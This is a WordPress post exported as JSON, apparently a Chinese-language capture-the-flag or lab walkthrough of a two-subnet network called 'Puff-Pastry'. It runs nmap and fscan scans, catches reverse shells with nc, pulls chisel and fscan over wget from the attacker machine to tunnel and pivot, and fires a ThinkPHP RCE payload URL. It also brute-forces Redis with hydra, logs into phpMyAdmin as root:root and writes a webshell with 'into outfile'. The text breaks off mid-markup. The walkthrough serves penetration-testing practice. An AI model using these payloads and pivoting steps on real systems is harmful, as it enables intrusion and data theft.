{"id":1117,"date":"2025-06-07T02:05:00","date_gmt":"2025-06-06T18:05:00","guid":{"rendered":"http:\/\/xiyu12.top\/?p=1117"},"modified":"2025-06-07T02:05:00","modified_gmt":"2025-06-06T18:05:00","slug":"puff-pastry","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=1117","title":{"rendered":"Puff-Pastry"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u7b2c\u4e00\u4e2a\u5185\u7f51<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">start<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ sudo nmap -p- 10.10.110.129\n&#91;sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-06 00:14 EDT\nNmap scan report for 10.10.110.129\nHost is up (0.00059s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n8080\/tcp open  http-proxy\nMAC Address: 00:0C:29:AD:96:36 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 14.42 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ sudo nmap -sCV -p 8080 10.10.110.129\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-06 00:15 EDT\nNmap scan report for 10.10.110.129\nHost is up (0.00029s latency).\n\nPORT     STATE SERVICE VERSION\n8080\/tcp open  http    Apache Tomcat (language: en)\n|_http-trane-info: Problem with XML parsing of \/evox\/about\n|_http-open-proxy: Proxy might be redirecting requests\n| http-title: Login Page\n|_Requested resource was http:\/\/10.10.110.129:8080\/login;jsessionid=89E28918C6DCEBA8F57F90D982BBD458\nMAC Address: 00:0C:29:AD:96:36 (VMware)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.86 seconds<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">shiro rce<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-114814-1024x572.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-114814-1024x572.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1119\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5f39shell<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-114850-1024x551.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-114850-1024x551.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1121\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;10.10.110.128] from (UNKNOWN) &#91;10.10.110.129] 59594\nbash: cannot set terminal process group (1): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@3dd344b922b1:\/# <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e0b\u8f7d\u5de5\u5177 chisel + fscan +busybox \u5230 kali(attack)<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains wget https:\/\/github.com\/shadow1ng\/fscan\/releases\/download\/1.8.4\/fscan<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains wget https:\/\/github.com\/jpillora\/chisel\/releases\/download\/v1.10.1\/chisel_1.10.1_linux_amd64.gz<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">proxychains wget https:\/\/busybox.net\/downloads\/binaries\/1.35.0-x86_64-linux-musl\/busybox<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f20\u6587\u4ef6<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ python3 -m http.server                                                        \nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# wget http:\/\/10.10.110.128:8000\/fscan\n\nroot@3dd344b922b1:\/tmp# wget http:\/\/10.10.110.128:8000\/chisel\n\nroot@3dd344b922b1:\/# wget http:\/\/10.10.110.128:8000\/busybox\n\n\nroot@3dd344b922b1:\/tmp# chmod +x chisel\n\n\u3002\u3002\u3002\u3002\u3002\u3002<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">root \u4e0d\u9700\u8981\u63d0\u6743\u4e86<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7f51\u7edc\u4fe1\u606f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# route -n\nroute -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n0.0.0.0         192.168.100.1   0.0.0.0         UG    0      0        0 eth0\n192.168.100.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# ifconfig\nifconfig\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.100.2  netmask 255.255.255.0  broadcast 192.168.100.255\n        ether 02:42:c0:a8:64:02  txqueuelen 0  (Ethernet)\n        RX packets 1037  bytes 16579223 (15.8 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 840  bytes 112183 (109.5 KiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        loop  txqueuelen 1000  (Local Loopback)\n        RX packets 0  bytes 0 (0.0 B)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 0  bytes 0 (0.0 B)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nroot@3dd344b922b1:\/tmp# \/busybox netstat -nltp\n\/busybox netstat -nltp\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1\/java\ntcp        0      0 127.0.0.11:45031        0.0.0.0:*               LISTEN      -<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/# .\/busybox traceroute 10.10.110.128\n.\/busybox traceroute 10.10.110.128\ntraceroute to 10.10.110.128 (10.10.110.128), 30 hops max, 46 byte packets\n 1  192.168.100.1 (192.168.100.1)  0.006 ms  0.008 ms  0.005 ms\n 2  10.10.110.128 (10.10.110.128)  0.219 ms  0.177 ms  0.106 ms<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/# .\/busybox ping -c 5 www.baidu.com\n.\/busybox ping -c 5 www.baidu.com\n\nPING www.baidu.com (39.156.70.239): 56 data bytes\n64 bytes from 39.156.70.239: seq=0 ttl=127 time=67.891 ms\n64 bytes from 39.156.70.239: seq=1 ttl=127 time=65.083 ms\n64 bytes from 39.156.70.239: seq=2 ttl=127 time=70.176 ms\n64 bytes from 39.156.70.239: seq=3 ttl=127 time=64.000 ms\n64 bytes from 39.156.70.239: seq=4 ttl=127 time=78.336 ms<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6a2a\u5411\u6e17\u900f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# .\/fscan -h 192.168.100.1-255\n.\/fscan -h 192.168.100.1-255\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.4\nstart infoscan\n(icmp) Target 192.168.100.1   is alive\n(icmp) Target 192.168.100.2   is alive\n(icmp) Target 192.168.100.3   is alive\n&#91;*] Icmp alive hosts len is: 3\n192.168.100.3:80 open\n192.168.100.1:22 open\n192.168.100.1:8080 open\n192.168.100.2:8080 open\n192.168.100.3:9000 open<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">192.168.100.3:80 open<br>192.168.100.3:9000 open<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;+] FCGI 192.168.100.3:9000 \nStatus: 403 Forbidden\nX-Powered-By: PHP\/7.3.33\nContent-type: text\/html; charset=UTF-8\nAccess denied.\nstderr:Access to the script '\/etc\/issue' has been denied (see security.limit_extensions)\nplesa try other path,as -path \/www\/wwwroot\/index.php\n\n\n&#91;*] WebTitle http:\/\/192.168.100.3      code:200 len:931    title:None\n&#91;+] PocScan http:\/\/192.168.100.3 poc-yaml-php-cgi-cve-2012-1823 \n&#91;+] PocScan http:\/\/192.168.100.3 poc-yaml-thinkphp5-controller-rce <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">chisel \u7aef\u53e3\u8f6c\u53d1<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 01:00:48 server: Reverse tunnelling enabled\n2025\/06\/06 01:00:48 server: Fingerprint kRRCqCsHRJTNpAh3Gn1uejwAC32xjSKcYXdD0kQCidE=\n2025\/06\/06 01:00:48 server: Listening on http:\/\/0.0.0.0:10130<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>root@3dd344b922b1:\/tmp# .\/chisel client 10.10.110.128:10130 R:10800:192.168.100.3:80&amp;\n&lt;lient 10.10.110.128:10130 R:10800:192.168.100.3:80&amp;\n&#91;1] 102\nroot@3dd344b922b1:\/tmp# 2025\/06\/06 05:03:00 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 05:03:00 client: Connected (Latency 699.267\u00b5s)\n\n\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 01:00:48 server: Reverse tunnelling enabled\n2025\/06\/06 01:00:48 server: Fingerprint kRRCqCsHRJTNpAh3Gn1uejwAC32xjSKcYXdD0kQCidE=\n2025\/06\/06 01:00:48 server: Listening on http:\/\/0.0.0.0:10130\n2025\/06\/06 01:03:01 server: session#1: tun: proxy#R:10800=&gt;192.168.100.3:80: Listening<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">thinkphp rce<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">[+] \u5b58\u5728ThinkPHP 5.0.22\/5.1.29 RCE<br><code>Payload: http:\/\/10.10.110.128:10800\/?s=\/index\/\\think\\app\/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=-1<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-130610-1024x555.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-130610-1024x555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1122\"\/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cd\u5f39shell<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-130807-1024x339.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-130807-1024x339.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1123\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ rlwrap nc -lvnp 8888\nlistening on &#91;any] 8888 ...\nconnect to &#91;10.10.110.128] from (UNKNOWN) &#91;10.10.110.129] 46990\nbash: cannot set terminal process group (9): Not a tty\nbash: no job control in this shell\nbash-5.1$ id\nid\nuid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)\nbash-5.1$ <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e8c\u4e2a\u5185\u7f51<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">www-data \u53ef\u80fd\u9700\u8981\u63d0\u6743<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7f51\u7edc\u4fe1\u606f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ ip a\nip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n33: eth1@if34: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:0a:55:65:02 brd ff:ff:ff:ff:ff:ff\n    inet 10.85.101.2\/24 brd 10.85.101.255 scope global eth1\n       valid_lft forever preferred_lft forever\n35: eth0@if36: &lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN&gt; mtu 1500 qdisc noqueue state UP \n    link\/ether 02:42:c0:a8:64:03 brd ff:ff:ff:ff:ff:ff\n    inet 192.168.100.3\/24 brd 192.168.100.255 scope global eth0\n       valid_lft forever preferred_lft forever\n\n\nbash-5.1$ netstat -nltp\nnetstat -nltp\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 127.0.0.11:33699        0.0.0.0:*               LISTEN      -                   \ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   \ntcp6       0      0 :::9000                 :::*                    LISTEN      20\/sh  <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ route -n\nroute -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n0.0.0.0         192.168.100.1   0.0.0.0         UG    0      0        0 eth0\n10.85.101.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1\n192.168.100.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6a2a\u5411\u6e17\u900f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ .\/fscan -h 10.85.101.1-255\n.\/fscan -h 10.85.101.1-255\n\n   ___                              _    \n  \/ _ \\     ___  ___ _ __ __ _  ___| | __ \n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;    \n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\   \n                     fscan version: 1.8.4\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 10.85.101.4     is alive\n(icmp) Target 10.85.101.3     is alive\n(icmp) Target 10.85.101.2     is alive\n(icmp) Target 10.85.101.1     is alive\n\n10.85.101.4:6379 open\n10.85.101.2:9000 open\n10.85.101.3:9000 open\n10.85.101.2:80 open\n10.85.101.3:80 open\n10.85.101.1:22 open<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">10.85.101.4:6379 open<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">10.85.101.3:9000 open<br>10.85.101.3:80 open<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;*] WebTitle http:\/\/10.85.101.3        code:200 len:19519  title:phpMyAdmin\n&#91;+] InfoScan http:\/\/10.85.101.3        &#91;phpMyAdmin] \n&#91;+] PocScan http:\/\/10.85.101.3 poc-yaml-php-cgi-cve-2012-1823 \n\n10.85.101.4:6379 open   reids<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">socks\u4ee3\u7406<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>bash-5.1$ .\/chisel client 10.10.110.128:10130 R:1080:socks&amp;\n.\/chisel client 10.10.110.128:10130 R:1080:socks&amp;\n&#91;1] 625\nbash-5.1$ 2025\/06\/06 06:16:13 client: Connecting to ws:\/\/10.10.110.128:10130\n2025\/06\/06 06:16:13 client: Connected (Latency 508.598\u00b5s)\n\n\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Desktop]\n\u2514\u2500$ .\/chisel server -p 10130 -reverse\n2025\/06\/06 01:00:48 server: Reverse tunnelling enabled\n2025\/06\/06 01:00:48 server: Fingerprint kRRCqCsHRJTNpAh3Gn1uejwAC32xjSKcYXdD0kQCidE=\n2025\/06\/06 01:00:48 server: Listening on http:\/\/0.0.0.0:10130\n2025\/06\/06 01:03:01 server: session#1: tun: proxy#R:10800=&gt;192.168.100.3:80: Listening\n2025\/06\/06 02:16:14 server: session#2: tun: proxy#R:127.0.0.1:1080=&gt;socks: Listening<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\u7f6e proxychains \u7684\u914d\u7f6e\u6587\u4ef6\u6307\u5411\u4ee3\u7406 \/etc\/proxychains4.conf<br>R:1080:socks&amp; \u9ed8\u8ba4\u7701\u7565127.0.0.1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;ProxyList]\n\n# add proxy here ...\n\n# meanwile\n\n# defaults set to \"tor\"\n\n#http 10.10.110.1 7890\n\nsocks5 127.0.0.1 1080<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains whatweb http:\/\/10.85.101.3                                                                    \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] DLL init: proxychains-ng 4.17\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:80  ...  OK\nhttp:\/\/10.85.101.3 &#91;200 OK] Bootstrap, Content-Security-Policy&#91;default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data:  *.tile.openstreetmap.org;object-src 'none';,default-src 'self' ;script-src 'self'  'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data:  *.tile.openstreetmap.org;object-src 'none';], Cookies&#91;phpMyAdmin,pma_lang], Country&#91;RESERVED]&#91;ZZ], HTML5, HTTPServer&#91;nginx\/1.26.3], HttpOnly&#91;phpMyAdmin,pma_lang], IP&#91;10.85.101.3], JQuery, PHP&#91;8.2.27], PasswordField&#91;pma_password], Script&#91;text\/javascript], Title&#91;phpMyAdmin], UncommonHeaders&#91;x-ob_mode,referrer-policy,content-security-policy,x-content-security-policy,x-webkit-csp,x-content-type-options,x-permitted-cross-domain-policies,x-robots-tag], X-Frame-Options&#91;DENY], X-Powered-By&#91;PHP\/8.2.27], X-XSS-Protection&#91;1; mode=block], nginx&#91;1.26.3], phpMyAdmin<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">redis \u5f31\u53e3\u4ee4<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains hydra -P \/usr\/share\/wordlists\/rockyou.txt redis:\/\/10.85.101.3:6379 <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains  redis-cli -h 10.85.101.3 -p 6379 -a 12345                       \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\nWarning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:6379  ...  OK\n10.85.101.3:6379&gt; KEYS *\n(empty array)\n10.85.101.3:6379&gt; <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>xiyu@xiyu-virtual-machine:~\/\u684c\u9762\/Puff-Pastry\/db-redis$ cat docker-entrypoint.sh #!\/bin\/sh\n\nrm -f \/docker-entrypoint.sh\n\nredis-server --save 20 1 --loglevel warning --requirepass 12345\n\nredis-cli -a 12345 SET flag \"$(cat \/flag.txt)\"xiyu@xiyu-virtual-machine:~\/\u684c\u9762\/Puff-Pastry\/db-redis$ <\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u80fd\u662f\u6ca1\u6709\u6267\u884c \u8fd9\u6587\u4ef6\u3002\u624b\u52a8\u6267\u884c\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> proxychains  redis-cli -h 10.85.101.3 -p 6379 -a 12345                       \n&#91;proxychains] config file found: \/etc\/proxychains4.conf\n&#91;proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n&#91;proxychains] DLL init: proxychains-ng 4.17\nWarning: Using a password with '-a' or '-u' option on the command line interface may not be safe.\n&#91;proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.85.101.3:6379  ...  OK\n10.85.101.3:6379&gt; KEYS *\n(empty array)\n10.85.101.3:6379&gt; KEYS *\n1) \"flag\"\n10.85.101.3:6379&gt; get flag\n\"WSS-Studio{Redis-870ed89a-6658-4350-8d17-9f293df5c6b1}\"\n10.85.101.3:6379&gt; <\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">phpmyadmin \u5f31\u5bc6\u7801<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\u7f6e socks5\u4ee3\u7406<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-185950.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-185950.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1125\" style=\"width:307px;height:auto\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">root:root<br>\u76f4\u63a5\u767b\u9646\u4f1a\u62a5\u9519\uff0c\u6e05\u9664cookie\u540e\u91cd\u65b0\u8bbf\u95ee\u53ef\u4ee5\u8fdb\u5165\u540e\u53f0\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-185653-1024x477.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-185653-1024x477.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1124\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">mysql\u5199\u5165 webshell \u83b7\u53d6\u53cd\u5f39shell<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u67e5\u770b\u5199\u5165\u6743\u9650show global variables like &#8216;%secure%&#8217;; *<br>![[Pasted image 20250606185656.png]]<\/li>\n\n\n\n<li>\u786e\u5b9a\u7f51\u7ad9\u6839\u76ee\u5f55 \/var\/www\/html(\u5e38\u89c1\u7684\u7f51\u7ad9\u8def\u5f84)<\/li>\n\n\n\n<li>select &#8221; into outfile &#8216;\/var\/www\/html\/shell.php&#8217;*<\/li>\n\n\n\n<li><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2025\/06\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2025-06-06-191141-1024x915.png'><img class=\"lazyload lazyload-style-1\" 